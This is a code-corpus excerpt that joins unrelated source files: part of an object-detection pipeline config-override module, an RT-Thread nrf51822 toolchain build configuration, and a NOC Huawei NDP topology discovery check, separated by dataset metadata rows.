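  # -> (True, "eval_input_configs", "eval_coco", "input_path")
  legacy = check_and_parse_input_config_key(configs, "train_input_path")
  # -> (True, "train_input_config", None, "input_path")
  return specific, legacy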
def merge_external_params_with_configs(configs, hparams=None, kwargs_dict=None):
"""Updates `configs` dictionary based on supplied parameters.
This utility is for modifying specific fields in the object detection configs.
Say that one would like to experiment with different learning rates, momentum
values, or batch sizes. Rather than creating a new config text file for each
experiment, one can use a single base config file, and update particular
values.
There are two types of field overrides:
1. Strategy-based overrides, which update multiple relevant configuration
options. For example, updating `learning_rate` will update both the warmup and
final learning rates.
In this case key can be one of the following formats:
1. legacy update: single string that indicates the attribute to be
updated. E.g. 'label_map_path', 'eval_input_path', 'shuffle'.
Note that when updating fields (e.g. eval_input_path, eval_shuffle) in
eval_input_configs, the override will only be applied when
eval_input_configs has exactly 1 element.
2. specific update: colon separated string that indicates which field in
which input_config to update. It should have 3 fields:
- key_name: Name of the input config we should update, either
'train_input_config' or 'eval_input_configs'
- input_name: a 'name' that can be used to identify elements, especially
when configs[key_name] is a repeated field.
- field_name: name of the field that you want to override.
For example, given configs dict as below:
configs = {
'model': {...}
'train_config': {...}
'train_input_config': {...}
'eval_config': {...}
'eval_input_configs': [{ name:"eval_coco", ...},
{ name:"eval_voc", ... }]
}
Assume we want to update the input_path of the eval_input_config
whose name is 'eval_coco'. The `key` would then be:
'eval_input_configs:eval_coco:input_path'
2. Generic key/value, which update a specific parameter based on namespaced
configuration keys. For example,
`model.ssd.loss.hard_example_miner.max_negatives_per_positive` will update the
hard example miner configuration for an SSD model config. Generic overrides
are automatically detected based on the namespaced keys.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
hparams: A `HParams`.
kwargs_dict: Extra keyword arguments that are treated the same way as
attribute/value pairs in `hparams`. Note that hyperparameters with the
same names will override keyword arguments.
Returns:
`configs` dictionary.
Raises:
ValueError: when the key string doesn't match any of its allowed formats.
"""
if kwargs_dict is None:
kwargs_dict = {}
if hparams:
kwargs_dict.update(hparams.values())
for key, value in kwargs_dict.items():
tf.logging.info("Maybe overwriting %s: %s", key, value)
# pylint: disable=g-explicit-bool-comparison
if value == "" or value is None:
continue
# pylint: enable=g-explicit-bool-comparison
elif _maybe_update_config_with_key_value(configs, key, value):
continue
elif _is_generic_key(key):
_update_generic(configs, key, value)
else:
tf.logging.info("Ignoring config override key: %s", key)
return configs
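def _example_override_configs(configs):
  # Editor's usage sketch, not part of the original module: overrides the
  # training batch size and the input path of a hypothetical eval reader named
  # "eval_coco" on top of an already loaded configs dictionary.
  return merge_external_params_with_configs(
      configs,
      kwargs_dict={
          "batch_size": 8,
          "eval_input_configs:eval_coco:input_path": "/tmp/eval.record",
      })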
def _maybe_update_config_with_key_value(configs, key, value):
"""Checks key type and updates `configs` with the key value pair accordingly.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
key: String indicates the field(s) to be updated.
value: Value used to override existing field value.
Returns:
A boolean value that indicates whether the override succeeds.
Raises:
ValueError: when the key string doesn't match any of the formats above.
"""
is_valid_input_config_key, key_name, input_name, field_name = (
check_and_parse_input_config_key(configs, key))
if is_valid_input_config_key:
update_input_reader_config(
configs,
key_name=key_name,
input_name=input_name,
field_name=field_name,
value=value)
elif field_name == "learning_rate":
_update_initial_learning_rate(configs, value)
elif field_name == "batch_size":
_update_batch_size(configs, value)
elif field_name == "momentum_optimizer_value":
_update_momentum_optimizer_value(configs, value)
elif field_name == "classification_localization_weight_ratio":
# Localization weight is fixed to 1.0.
_update_classification_localization_weight_ratio(configs, value)
elif field_name == "focal_loss_gamma":
_update_focal_loss_gamma(configs, value)
elif field_name == "focal_loss_alpha":
_update_focal_loss_alpha(configs, value)
elif field_name == "train_steps":
_update_train_steps(configs, value)
elif field_name == "label_map_path":
_update_label_map_path(configs, value)
elif field_name == "mask_type":
_update_mask_type(configs, value)
elif field_name == "sample_1_of_n_eval_examples":
_update_all_eval_input_configs(configs, "sample_1_of_n_examples", value)
elif field_name == "eval_num_epochs":
_update_all_eval_input_configs(configs, "num_epochs", value)
elif field_name == "eval_with_moving_averages":
_update_use_moving_averages(configs, value)
elif field_name == "retain_original_images_in_eval":
_update_retain_original_images(configs["eval_config"], value)
elif field_name == "use_bfloat16":
_update_use_bfloat16(configs, value)
elif field_name == "retain_original_image_additional_channels_in_eval":
_update_retain_original_image_additional_channels(configs["eval_config"],
value)
elif field_name == "num_classes":
_update_num_classes(configs["model"], value)
elif field_name == "sample_from_datasets_weights":
_update_sample_from_datasets_weights(configs["train_input_config"], value)
elif field_name == "peak_max_pool_kernel_size":
_update_peak_max_pool_kernel_size(configs["model"], value)
elif field_name == "candidate_search_scale":
_update_candidate_search_scale(configs["model"], value)
elif field_name == "candidate_ranking_mode":
_update_candidate_ranking_mode(configs["model"], value)
elif field_name == "score_distance_offset":
_update_score_distance_offset(configs["model"], value)
elif field_name == "box_scale":
_update_box_scale(configs["model"], value)
elif field_name == "keypoint_candidate_score_threshold":
_update_keypoint_candidate_score_threshold(configs["model"], value)
elif field_name == "rescore_instances":
_update_rescore_instances(configs["model"], value)
elif field_name == "unmatched_keypoint_score":
_update_unmatched_keypoint_score(configs["model"], value)
elif field_name == "score_distance_multiplier":
_update_score_distance_multiplier(configs["model"], value)
elif field_name == "std_dev_multiplier":
_update_std_dev_multiplier(configs["model"], value)
elif field_name == "rescoring_threshold":
_update_rescoring_threshold(configs["model"], value)
else:
return False
return True
def _update_tf_record_input_path(input_config, input_path):
"""Updates input configuration to reflect a new input path.
The input_config object is updated in place, and hence not returned.
Args:
input_config: A input_reader_pb2.InputReader.
input_path: A path to data or list of paths.
Raises:
TypeError: if input reader type is not `tf_record_input_reader`.
"""
input_reader_type = input_config.WhichOneof("input_reader")
if input_reader_type == "tf_record_input_reader":
input_config.tf_record_input_reader.ClearField("input_path")
if isinstance(input_path, list):
input_config.tf_record_input_reader.input_path.extend(input_path)
else:
input_config.tf_record_input_reader.input_path.append(input_path)
else:
raise TypeError("Input reader type must be `tf_record_input_reader`.")
def update_input_reader_config(configs,
key_name=None,
input_name=None,
field_name=None,
value=None,
path_updater=_update_tf_record_input_path):
"""Updates specified input reader config field.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
key_name: Name of the input config we should update, either
'train_input_config' or 'eval_input_configs'
input_name: String name used to identify input config to update with. Should
be either None or value of the 'name' field in one of the input reader
configs.
field_name: Field name in input_reader_pb2.InputReader.
value: Value used to override existing field value.
path_updater: helper function used to update the input path. Only used when
field_name is "input_path".
Raises:
ValueError: when input field_name is None.
ValueError: when input_name is None and number of eval_input_readers does
not equal to 1.
"""
if isinstance(configs[key_name], input_reader_pb2.InputReader):
# Updates singular input_config object.
target_input_config = configs[key_name]
if field_name == "input_path":
path_updater(input_config=target_input_config, input_path=value)
else:
setattr(target_input_config, field_name, value)
elif input_name is None and len(configs[key_name]) == 1:
# Updates first (and the only) object of input_config list.
target_input_config = configs[key_name][0]
if field_name == "input_path":
path_updater(input_config=target_input_config, input_path=value)
else:
setattr(target_input_config, field_name, value)
elif input_name is not None and len(configs[key_name]):
# Updates input_config whose name matches input_name.
update_count = 0
for input_config in configs[key_name]:
if input_config.name == input_name:
setattr(input_config, field_name, value)
update_count = update_count + 1
if not update_count:
raise ValueError(
"Input name {} not found when overriding.".format(input_name))
elif update_count > 1:
raise ValueError("Duplicate input name found when overriding.")
else:
key_name = "None" if key_name is None else key_name
input_name = "None" if input_name is None else input_name
field_name = "None" if field_name is None else field_name
raise ValueError("Unknown input config overriding: "
"key_name:{}, input_name:{}, field_name:{}.".format(
key_name, input_name, field_name))
def _update_initial_learning_rate(configs, learning_rate):
"""Updates `configs` to reflect the new initial learning rate.
This function updates the initial learning rate. For learning rate schedules,
all other defined learning rates in the pipeline config are scaled to maintain
their same ratio with the initial learning rate.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
learning_rate: Initial learning rate for optimizer.
Raises:
TypeError: if optimizer type is not supported, or if learning rate type is
not supported.
"""
optimizer_type = get_optimizer_type(configs["train_config"])
if optimizer_type == "rms_prop_optimizer":
optimizer_config = configs["train_config"].optimizer.rms_prop_optimizer
elif optimizer_type == "momentum_optimizer":
optimizer_config = configs["train_config"].optimizer.momentum_optimizer
elif optimizer_type == "adam_optimizer":
optimizer_config = configs["train_config"].optimizer.adam_optimizer
else:
raise TypeError("Optimizer %s is not supported." % optimizer_type)
learning_rate_type = get_learning_rate_type(optimizer_config)
if learning_rate_type == "constant_learning_rate":
constant_lr = optimizer_config.learning_rate.constant_learning_rate
constant_lr.learning_rate = learning_rate
elif learning_rate_type == "exponential_decay_learning_rate":
exponential_lr = (
optimizer_config.learning_rate.exponential_decay_learning_rate)
exponential_lr.initial_learning_rate = learning_rate
elif learning_rate_type == "manual_step_learning_rate":
manual_lr = optimizer_config.learning_rate.manual_step_learning_rate
original_learning_rate = manual_lr.initial_learning_rate
learning_rate_scaling = float(learning_rate) / original_learning_rate
manual_lr.initial_learning_rate = learning_rate
for schedule in manual_lr.schedule:
schedule.learning_rate *= learning_rate_scaling
elif learning_rate_type == "cosine_decay_learning_rate":
cosine_lr = optimizer_config.learning_rate.cosine_decay_learning_rate
learning_rate_base = cosine_lr.learning_rate_base
warmup_learning_rate = cosine_lr.warmup_learning_rate
warmup_scale_factor = warmup_learning_rate / learning_rate_base
cosine_lr.learning_rate_base = learning_rate
cosine_lr.warmup_learning_rate = warmup_scale_factor * learning_rate
else:
raise TypeError("Learning rate %s is not supported." % learning_rate_type)
def _update_batch_size(configs, batch_size):
"""Updates `configs` to reflect the new training batch size.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
batch_size: Batch size to use for training (Ideally a power of 2). Inputs
are rounded, and capped to be 1 or greater.
"""
configs["train_config"].batch_size = max(1, int(round(batch_size)))
def _validate_message_has_field(message, field):
if not message.HasField(field):
raise ValueError("Expecting message to have field %s" % field)
def _update_generic(configs, key, value):
"""Update a pipeline configuration parameter based on a generic key/value.
Args:
configs: Dictionary of pipeline configuration protos.
key: A string key, dot-delimited to represent the argument key.
e.g. "model.ssd.train_config.batch_size"
value: A value to set the argument to. The type of the value must match the
type for the protocol buffer. Note that setting the wrong type will
result in a TypeError.
e.g. 42
Raises:
ValueError if the message key does not match the existing proto fields.
TypeError the value type doesn't match the protobuf field type.
"""
fields = key.split(".")
first_field = fields.pop(0)
last_field = fields.pop()
message = configs[first_field]
for field in fields:
_validate_message_has_field(message, field)
message = getattr(message, field)
_validate_message_has_field(message, last_field)
setattr(message, last_field, value)
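# Example trace of the generic override above (assuming the referenced fields
# are set in the config): the key "model.faster_rcnn.num_classes" splits into
# first_field="model", intermediate fields ["faster_rcnn"] and
# last_field="num_classes", so configs["model"].faster_rcnn.num_classes is set
# to the supplied value.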
def _update_momentum_optimizer_value(configs, momentum):
"""Updates `configs` to reflect the new momentum value.
Momentum is only supported for RMSPropOptimizer and MomentumOptimizer. For any
other optimizer, no changes take place. The configs dictionary is updated in
place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
momentum: New momentum value. Values are clipped at 0.0 and 1.0.
Raises:
TypeError: If the optimizer type is not `rms_prop_optimizer` or
`momentum_optimizer`.
"""
optimizer_type = get_optimizer_type(configs["train_config"])
if optimizer_type == "rms_prop_optimizer":
optimizer_config = configs["train_config"].optimizer.rms_prop_optimizer
elif optimizer_type == "momentum_optimizer":
optimizer_config = configs["train_config"].optimizer.momentum_optimizer
else:
raise TypeError("Optimizer type must be one of `rms_prop_optimizer` or "
"`momentum_optimizer`.")
optimizer_config.momentum_optimizer_value = min(max(0.0, momentum), 1.0)
def _update_classification_localization_weight_ratio(configs, ratio):
"""Updates the classification/localization weight loss ratio.
Detection models usually define a loss weight for both classification and
objectness. This function updates the weights such that the ratio between
classification weight to localization weight is the ratio provided.
Arbitrarily, localization weight is set to 1.0.
Note that in the case of Faster R-CNN, this same ratio is applied to the first
stage objectness loss weight relative to localization loss weight.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
ratio: Desired ratio of classification (and/or objectness) loss weight to
localization loss weight.
"""
meta_architecture = configs["model"].WhichOneof("model")
if meta_architecture == "faster_rcnn":
model = configs["model"].faster_rcnn
model.first_stage_localization_loss_weight = 1.0
model.first_stage_objectness_loss_weight = ratio
model.second_stage_localization_loss_weight = 1.0
model.second_stage_classification_loss_weight = ratio
if meta_architecture == "ssd":
model = configs["model"].ssd
model.loss.localization_weight = 1.0
model.loss.classification_weight = ratio
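# For example, calling the function above with ratio=2.0 on an SSD config
# leaves loss.localization_weight at 1.0 and sets loss.classification_weight
# to 2.0, i.e. a 2:1 classification-to-localization weighting.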
def _get_classification_loss(model_config):
"""Returns the classification loss for a model."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "faster_rcnn":
model = model_config.faster_rcnn
classification_loss = model.second_stage_classification_loss
elif meta_architecture == "ssd":
model = model_config.ssd
classification_loss = model.loss.classification_loss
else:
raise TypeError("Did not recognize the model architecture.")
return classification_loss
def _update_focal_loss_gamma(configs, gamma):
"""Updates the gamma value for a sigmoid focal loss.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
gamma: Exponent term in focal loss.
Raises:
TypeError: If the classification loss is not `weighted_sigmoid_focal`.
"""
classification_loss = _get_classification_loss(configs["model"])
classification_loss_type = classification_loss.WhichOneof(
"classification_loss")
if classification_loss_type != "weighted_sigmoid_focal":
raise TypeError("Classification loss must be `weighted_sigmoid_focal`.")
classification_loss.weighted_sigmoid_focal.gamma = gamma
def _update_focal_loss_alpha(configs, alpha):
"""Updates the alpha value for a sigmoid focal loss.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
alpha: Class weight multiplier for sigmoid loss.
Raises:
TypeError: If the classification loss is not `weighted_sigmoid_focal`.
"""
classification_loss = _get_classification_loss(configs["model"])
classification_loss_type = classification_loss.WhichOneof(
"classification_loss")
if classification_loss_type != "weighted_sigmoid_focal":
raise TypeError("Classification loss must be `weighted_sigmoid_focal`.")
classification_loss.weighted_sigmoid_focal.alpha = alpha
def _update_train_steps(configs, train_steps):
"""Updates `configs` to reflect new number of training steps."""
configs["train_config"].num_steps = int(train_steps)
def _update_all_eval_input_configs(configs, field, value):
"""Updates the content of `field` with `value` for all eval input configs."""
for eval_input_config in configs["eval_input_configs"]:
setattr(eval_input_config, field, value)
def _update_label_map_path(configs, label_map_path):
"""Updates the label map path for both train and eval input readers.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
label_map_path: New path to `StringIntLabelMap` pbtxt file.
"""
configs["train_input_config"].label_map_path = label_map_path
_update_all_eval_input_configs(configs, "label_map_path", label_map_path)
def _update_mask_type(configs, mask_type):
"""Updates the mask type for both train and eval input readers.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
mask_type: A string name representing a value of
input_reader_pb2.InstanceMaskType
"""
configs["train_input_config"].mask_type = mask_type
_update_all_eval_input_configs(configs, "mask_type", mask_type)
def _update_use_moving_averages(configs, use_moving_averages):
"""Updates the eval config option to use or not use moving averages.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
use_moving_averages: Boolean indicating whether moving average variables
should be loaded during evaluation.
"""
configs["eval_config"].use_moving_averages = use_moving_averages
def _update_retain_original_images(eval_config, retain_original_images):
"""Updates eval config with option to retain original images.
The eval_config object is updated in place, and hence not returned.
Args:
eval_config: A eval_pb2.EvalConfig.
retain_original_images: Boolean indicating whether to retain original images
in eval mode.
"""
eval_config.retain_original_images = retain_original_images
def _update_use_bfloat16(configs, use_bfloat16):
"""Updates `configs` to reflect the new setup on whether to use bfloat16.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
use_bfloat16: A bool, indicating whether to use bfloat16 for training.
"""
configs["train_config"].use_bfloat16 = use_bfloat16
def _update_retain_original_image_additional_channels(
eval_config,
retain_original_image_additional_channels):
"""Updates eval config to retain original image additional channels or not.
The eval_config object is updated in place, and hence not returned.
Args:
eval_config: A eval_pb2.EvalConfig.
retain_original_image_additional_channels: Boolean indicating whether to
retain original image additional channels in eval mode.
"""
eval_config.retain_original_image_additional_channels = (
retain_original_image_additional_channels)
def remove_unnecessary_ema(variables_to_restore, no_ema_collection=None):
"""Remap and Remove EMA variable that are not created during training.
ExponentialMovingAverage.variables_to_restore() returns a map of EMA names
to tf variables to restore. E.g.:
{
conv/batchnorm/gamma/ExponentialMovingAverage: conv/batchnorm/gamma,
conv_4/conv2d_params/ExponentialMovingAverage: conv_4/conv2d_params,
global_step: global_step
}
This function takes care of the extra ExponentialMovingAverage variables
that get created during eval but aren't available in the checkpoint, by
remapping the key to the variable itself, and remove the entry of its EMA from
the variables to restore. An example resulting dictionary would look like:
{
conv/batchnorm/gamma: conv/batchnorm/gamma,
conv_4/conv2d_params: conv_4/conv2d_params,
global_step: global_step
}
Args:
variables_to_restore: A dictionary created by ExponentialMovingAverage.
variables_to_restore().
no_ema_collection: A list of namescope substrings to match the variables
to eliminate EMA.
Returns:
A variables_to_restore dictionary excluding the collection of unwanted
EMA mapping.
"""
if no_ema_collection is None:
return variables_to_restore
restore_map = {}
for key in variables_to_restore:
if ("ExponentialMovingAverage" in key
and any([name in key for name in no_ema_collection])):
new_key = key.replace("/ExponentialMovingAverage", "")
else:
new_key = key
restore_map[new_key] = variables_to_restore[key]
return restore_map
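# A plain-dict sketch of the remapping above (string values stand in for tf
# variables):
#   >>> remove_unnecessary_ema(
#   ...     {"conv/gamma/ExponentialMovingAverage": "v1", "global_step": "v2"},
#   ...     no_ema_collection=["gamma"])
#   {'conv/gamma': 'v1', 'global_step': 'v2'}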
def _update_num_classes(model_config, num_classes):
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "faster_rcnn":
model_config.faster_rcnn.num_classes = num_classes
if meta_architecture == "ssd":
model_config.ssd.num_classes = num_classes
def _update_sample_from_datasets_weights(input_reader_config, weights):
"""Updated sample_from_datasets_weights with overrides."""
if len(weights) != len(input_reader_config.sample_from_datasets_weights):
raise ValueError(
"sample_from_datasets_weights override has a different number of values"
" ({}) than the configured dataset weights ({})."
.format(
            len(weights),
            len(input_reader_config.sample_from_datasets_weights)))
del input_reader_config.sample_from_datasets_weights[:]
input_reader_config.sample_from_datasets_weights.extend(weights)
def _update_peak_max_pool_kernel_size(model_config, kernel_size):
"""Updates the max pool kernel size (NMS) for keypoints in CenterNet."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.peak_max_pool_kernel_size = kernel_size
else:
tf.logging.warning("Ignoring config override key for "
"peak_max_pool_kernel_size since there are multiple "
"keypoint estimation tasks")
def _update_candidate_search_scale(model_config, search_scale):
"""Updates the keypoint candidate search scale in CenterNet."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.candidate_search_scale = search_scale
else:
tf.logging.warning("Ignoring config override key for "
"candidate_search_scale since there are multiple "
"keypoint estimation tasks")
def _update_candidate_ranking_mode(model_config, mode):
"""Updates how keypoints are snapped to candidates in CenterNet."""
if mode not in ("min_distance", "score_distance_ratio",
"score_scaled_distance_ratio", "gaussian_weighted"):
raise ValueError("Attempting to set the keypoint candidate ranking mode "
"to {}, but the only options are 'min_distance', "
"'score_distance_ratio', 'score_scaled_distance_ratio', "
"'gaussian_weighted'.".format(mode))
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.candidate_ranking_mode = mode
else:
tf.logging.warning("Ignoring config override key for "
"candidate_ranking_mode since there are multiple "
"keypoint estimation tasks")
def _update_score_distance_offset(model_config, offset):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.score_distance_offset = offset
else:
tf.logging.warning("Ignoring config override key for "
"score_distance_offset since there are multiple "
"keypoint estimation tasks")
def _update_box_scale(model_config, box_scale):
"""Updates the keypoint candidate search region. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.box_scale = box_scale
else:
tf.logging.warning("Ignoring config override key for box_scale since "
"there are multiple keypoint estimation tasks")
def _update_keypoint_candidate_score_threshold(model_config, threshold):
"""Updates the keypoint candidate score threshold. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.keypoint_candidate_score_threshold = threshold
else:
tf.logging.warning("Ignoring config override key for "
"keypoint_candidate_score_threshold since there are "
"multiple keypoint estimation tasks")
def _update_rescore_instances(model_config, should_rescore):
"""Updates whether boxes should be rescored based on keypoint confidences."""
if isinstance(should_rescore, str):
    should_rescore = should_rescore == "True"
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.rescore_instances = should_rescore
else:
tf.logging.warning("Ignoring config override key for "
"rescore_instances since there are multiple keypoint "
"estimation tasks")
def _update_unmatched_keypoint_score(model_config, score):
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.unmatched_keypoint_score = score
else:
tf.logging.warning("Ignoring config override key for "
"unmatched_keypoint_score since there are multiple "
"keypoint estimation tasks")
def _update_score_distance_multiplier(model_config, score_distance_multiplier):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.score_distance_multiplier = score_distance_multiplier
else:
tf.logging.warning("Ignoring config override key for "
"score_distance_multiplier since there are multiple "
"keypoint estimation tasks")
else:
raise ValueError(
"Unsupported meta_architecture type: %s" % meta_architecture)
def _update_std_dev_multiplier(model_config, std_dev_multiplier):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.std_dev_multiplier = std_dev_multiplier
else:
tf.logging.warning("Ignoring config override key for "
"std_dev_multiplier since there are multiple "
"keypoint estimation tasks")
else:
raise ValueError(
"Unsupported meta_architecture type: %s" % meta_architecture)
def _update_rescoring_threshold(model_config, rescoring_threshold):
"""Updates the keypoint candidate selection metric. See CenterNet proto."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "center_net":
if len(model_config.center_net.keypoint_estimation_task) == 1:
kpt_estimation_task = model_config.center_net.keypoint_estimation_task[0]
kpt_estimation_task.rescoring_threshold = rescoring_threshold
else:
tf.logging.warning("Ignoring config override key for "
"rescoring_threshold since there are multiple "
"keypoint estimation tasks")
else:
raise ValueError(
"Unsupported meta_architecture type: %s" % meta_architecture)
| 41.357704
| 81
| 0.729485
|
bfa1a160f12e69c398b1015d1dbf25f17e847797
| 2,499
|
py
|
Python
|
bsp/nrf5x/nrf51822/rtconfig.py
|
rockonedege/rt-thread
|
4fe6c709d0bfe719bed6c927f0144ba373bbda5a
|
[
"Apache-2.0"
] | 7,482
|
2015-01-01T09:23:08.000Z
|
2022-03-31T19:34:05.000Z
|
bsp/nrf5x/nrf51822/rtconfig.py
|
ArdaFu/rt-thread
|
eebb2561ec166e0016187c7b7998ada4f8212b3a
|
[
"Apache-2.0"
] | 2,543
|
2015-01-09T02:01:34.000Z
|
2022-03-31T23:10:14.000Z
|
bsp/nrf5x/nrf51822/rtconfig.py
|
ArdaFu/rt-thread
|
eebb2561ec166e0016187c7b7998ada4f8212b3a
|
[
"Apache-2.0"
] | 4,645
|
2015-01-06T07:05:31.000Z
|
2022-03-31T18:21:50.000Z
|
import os
# toolchains options
ARCH='arm'
CPU='cortex-m0'
CROSS_TOOL='keil'
if os.getenv('RTT_CC'):
CROSS_TOOL = os.getenv('RTT_CC')
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = 'D:/SourceryGCC/bin'
elif CROSS_TOOL == 'keil':
PLATFORM = 'armcc'
EXEC_PATH = 'C:/Keil_v5'
elif CROSS_TOOL == 'iar':
print('================ERROR============================')
    print('IAR is not supported yet!')
print('=================================================')
exit(0)
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
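# For example, the toolchain can be selected from the environment before the
# BSP build is started (the path below is only a placeholder):
#   RTT_CC=gcc RTT_EXEC_PATH=/opt/gcc-arm-none-eabi/bin scons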
BUILD = 'debug'
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'arm-none-eabi-'
CC = PREFIX + 'gcc'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu='+CPU + ' -mthumb -ffunction-sections -fdata-sections'
CFLAGS = DEVICE
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
LFLAGS = DEVICE + ' -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,Reset_Handler -T board/linker_scripts/link.lds'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
elif PLATFORM == 'armcc':
# toolchains
CC = 'armcc'
AS = 'armasm'
AR = 'armar'
LINK = 'armlink'
TARGET_EXT = 'axf'
DEVICE = ' --device DARMSTM'
CFLAGS = DEVICE + ' --apcs=interwork'
AFLAGS = DEVICE
LFLAGS = DEVICE + ' --info sizes --info totals --info unused --info veneers --list rtthread.map --scatter "board\linker_scripts\link.sct"'
CFLAGS += ' --c99'
CFLAGS += ' -I' + EXEC_PATH + '/ARM/RV31/INC'
LFLAGS += ' --libpath ' + EXEC_PATH + '/ARM/RV31/LIB'
EXEC_PATH += '/arm/bin40/'
if BUILD == 'debug':
CFLAGS += ' -g -O0'
AFLAGS += ' -g'
else:
CFLAGS += ' -O2'
POST_ACTION = 'fromelf --bin $TARGET --output rtthread.bin \nfromelf -z $TARGET'
def dist_handle(BSP_ROOT, dist_dir):
import sys
cwd_path = os.getcwd()
sys.path.append(os.path.join(os.path.dirname(BSP_ROOT), 'tools'))
from sdk_dist import dist_do_building
dist_do_building(BSP_ROOT, dist_dir)
| 26.870968
| 142
| 0.57503
|
17ad4871feefea07c0740a488d99ba8c0d14ba9b
| 923
|
py
|
Python
|
services/discovery/jobs/box/huawei_ndp.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
services/discovery/jobs/box/huawei_ndp.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
services/discovery/jobs/box/huawei_ndp.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ---------------------------------------------------------------------
# Huawei NDP check
# ---------------------------------------------------------------------
# Copyright (C) 2007-2016 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.services.discovery.jobs.base import TopologyDiscoveryCheck
class HuaweiNDPCheck(TopologyDiscoveryCheck):
"""
    Huawei NDP Topology discovery
"""
name = "huawei_ndp"
required_script = "get_huawei_ndp_neighbors"
required_capabilities = ["Huawei | NDP"]
